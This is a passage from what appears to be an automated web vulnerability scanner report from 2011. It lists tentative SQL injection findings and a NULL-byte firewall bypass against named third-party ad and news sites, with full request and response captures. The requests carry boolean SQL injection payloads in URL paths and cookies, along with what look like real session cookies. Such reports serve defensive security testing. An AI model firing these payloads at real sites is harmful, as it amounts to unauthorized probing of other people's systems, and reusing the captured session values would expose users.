NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adsc/d852149/4%00'/864449/decide.php?&noiframe=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 17:27:37 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc/d852149/4%00''/864449/decide.php?&noiframe=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 17:30:48 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 301

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc/d852149/4 was not found on this server.</p>
<hr
...[SNIP]...

1.6. http://assets.rubiconproject.com/static/rtb/sync-min.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://assets.rubiconproject.com
Path:   /static/rtb/sync-min.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11180680'%20or%201%3d1--%20 and 11180680'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static/rtb/sync-min.html11180680'%20or%201%3d1--%20 HTTP/1.1
Host: assets.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; pup_1994=1296072492983; put_1994=6ch47d7o8wtv; pup_w55c=1296073239463; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; pup_2025=1296224125224; pup_1512=1296224128533; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; pup_1430=1296224129445; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; pup_fimserve=1296224133489; pup_1902=1296226099073; pup_2081=1296226100651; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; pup_2101=1296226106985; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; pup_2084=1296226112564; pup_1185=1296226114213; pup_1986=1296226114410; put_1185=3011330574290390485; pup_2132=1296226115755; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; pup_2100=1296226117318; put_2100=usr3fd748acf5bcab14; pup_1197=1296232890383; pup_rubicon=1296232891481; put_1197=3297869551067506954; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; khaos=GIPAEQ2D-C-IOYY; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; ses9=9320^1&7531^1; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; cd=false; ruid=154d290e46adc1d6f373dd09^7^1296350983^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=7665/13236; rdk2=0; ses2=7531^1&13236^1; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 241
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 30 Jan 2011 02:05:46 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html11180680' or 1=1-- was not
...[SNIP]...
</p>
</body></html>

Request 2

GET /static/rtb/sync-min.html11180680'%20or%201%3d2--%20 HTTP/1.1
Host: assets.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; pup_1994=1296072492983; put_1994=6ch47d7o8wtv; pup_w55c=1296073239463; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; pup_2025=1296224125224; pup_1512=1296224128533; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; pup_1430=1296224129445; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; pup_fimserve=1296224133489; pup_1902=1296226099073; pup_2081=1296226100651; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; pup_2101=1296226106985; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; pup_2084=1296226112564; pup_1185=1296226114213; pup_1986=1296226114410; put_1185=3011330574290390485; pup_2132=1296226115755; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; pup_2100=1296226117318; put_2100=usr3fd748acf5bcab14; pup_1197=1296232890383; pup_rubicon=1296232891481; put_1197=3297869551067506954; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; khaos=GIPAEQ2D-C-IOYY; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; ses9=9320^1&7531^1; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; cd=false; ruid=154d290e46adc1d6f373dd09^7^1296350983^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=7665/13236; rdk2=0; ses2=7531^1&13236^1; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 332
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 30 Jan 2011 02:05:46 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html11180680' or 1=2-- was not
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

1.7. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://assets.rubiconproject.com
Path:   /static/rtb/sync-min.html/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 77927196'%20or%201%3d1--%20 and 77927196'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static/rtb/sync-min.html77927196'%20or%201%3d1--%20/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; pup_2081=1296226100651; lm="28 Jan 2011 14:48:45 GMT"; pup_2084=1296226112564; pup_w55c=1296073239463; put_2132=D8DB51BF08484217F5D14AB47F4002AD; pup_2132=1296226115755; pup_rubicon=1296232891481; pup_1902=1296226099073; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; put_1185=3011330574290390485; pup_1197=1296232890383; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; rdk=7665/13236; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; put_2081=CA-00000000456885722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_1994=6ch47d7o8wtv; pup_1512=1296224128533; pup_1986=1296226114410; pup_2100=1296226117318; pup_2025=1296224125224; pup_2101=1296226106985; put_2100=usr3fd748acf5bcab14; pup_1430=1296224129445; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; pup_1185=1296226114213; khaos=GIPAEQ2D-C-IOYY; put_1197=3297869551067506954; au=GIP9HWY4-MADS-10.208.38.239; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^7^1296350983^2915161843; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; ses9=9320^1&7531^1; pup_fimserve=1296224133489; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1986=4760492999213801733; rdk2=0; ses2=7531^1&13236^1; cd=false;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 333
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 30 Jan 2011 02:05:47 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html77927196' or 1=1-- / was not
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

Request 2

GET /static/rtb/sync-min.html77927196'%20or%201%3d2--%20/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; pup_2081=1296226100651; lm="28 Jan 2011 14:48:45 GMT"; pup_2084=1296226112564; pup_w55c=1296073239463; put_2132=D8DB51BF08484217F5D14AB47F4002AD; pup_2132=1296226115755; pup_rubicon=1296232891481; pup_1902=1296226099073; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; put_1185=3011330574290390485; pup_1197=1296232890383; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; rdk=7665/13236; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; put_2081=CA-00000000456885722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_1994=6ch47d7o8wtv; pup_1512=1296224128533; pup_1986=1296226114410; pup_2100=1296226117318; pup_2025=1296224125224; pup_2101=1296226106985; put_2100=usr3fd748acf5bcab14; pup_1430=1296224129445; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; pup_1185=1296226114213; khaos=GIPAEQ2D-C-IOYY; put_1197=3297869551067506954; au=GIP9HWY4-MADS-10.208.38.239; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^7^1296350983^2915161843; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; ses9=9320^1&7531^1; pup_fimserve=1296224133489; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1986=4760492999213801733; rdk2=0; ses2=7531^1&13236^1; cd=false;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 242
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 30 Jan 2011 02:05:47 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html77927196' or 1=2-- / was not
...[SNIP]...
</p>
</body></html>

1.8. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90 [id cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The id cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the id cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380'%20and%201%3d1--%20; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; ATTWL=CollectiveB3; session=1296350849|1296350849

Response 1

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:42:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1010594923/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1010594923?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1010594923/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1010594923?">\n');
document.write ('</SCRIPT>\n');
document.write ('<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1010594923/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1010594923?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1010594923?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>\n');
document.write ('</NOSCRIPT>\n');
document.write ('</IFRAME>\n');
document.write ('<SCRIPT TYPE="text/javascript" language="JavaScript">\n');
document.write ('var B3d=new Date();\n');
document.write ('var B3m=B3d.getTime();\n');
document.write ('B3d.setTime(B3m+30*24*60*60*100
...[SNIP]...

Request 2

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380'%20and%201%3d2--%20; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; ATTWL=CollectiveB3; session=1296350849|1296350849

Response 2

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:42:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3174
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/71084410/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=71084410?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/71084410/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=71084410?">\n');
document.write ('</SCRIPT>\n');
document.write ('<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/71084410/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=71084410?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=71084410?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>\n');
document.write ('</NOSCRIPT>\n');
document.write ('</IFRAME>\n');
document.write ('<SCRIPT TYPE="text/javascript" language="JavaScript">\n');
document.write ('var B3d=new Date();\n');
document.write ('var B3m=B3d.getTime();\n');
document.write ('B3d.setTime(B3m+30*24*60*60*1000);\n');
docum
...[SNIP]...

1.9. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://english.aljazeera.net
Path:   /news/middleeast/2011/01/201113085252994161.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news'%20and%201%3d1--%20/middleeast/2011/01/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:52:15 GMT
Expires: Sun, 30 Jan 2011 14:52:15 GMT
Date: Sun, 30 Jan 2011 14:52:15 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gegnmk55z3ufcfy344ht1a45; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 64156
X-Cache: MISS from 12.120.11.62
Via: 1.1 12.120.11.62:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Egypt shuts down Al Jazeera bureau - Middle East - Al Jazeera English
</title><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta id="ctl00_meta1" name="description" content="Network's licences cancelled and accreditation of staff in Cairo withdrawn by order of information minister." /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:51:59 GMT" /><link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" /><link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/AddthisSettings.js" type="text/javascript"></script>
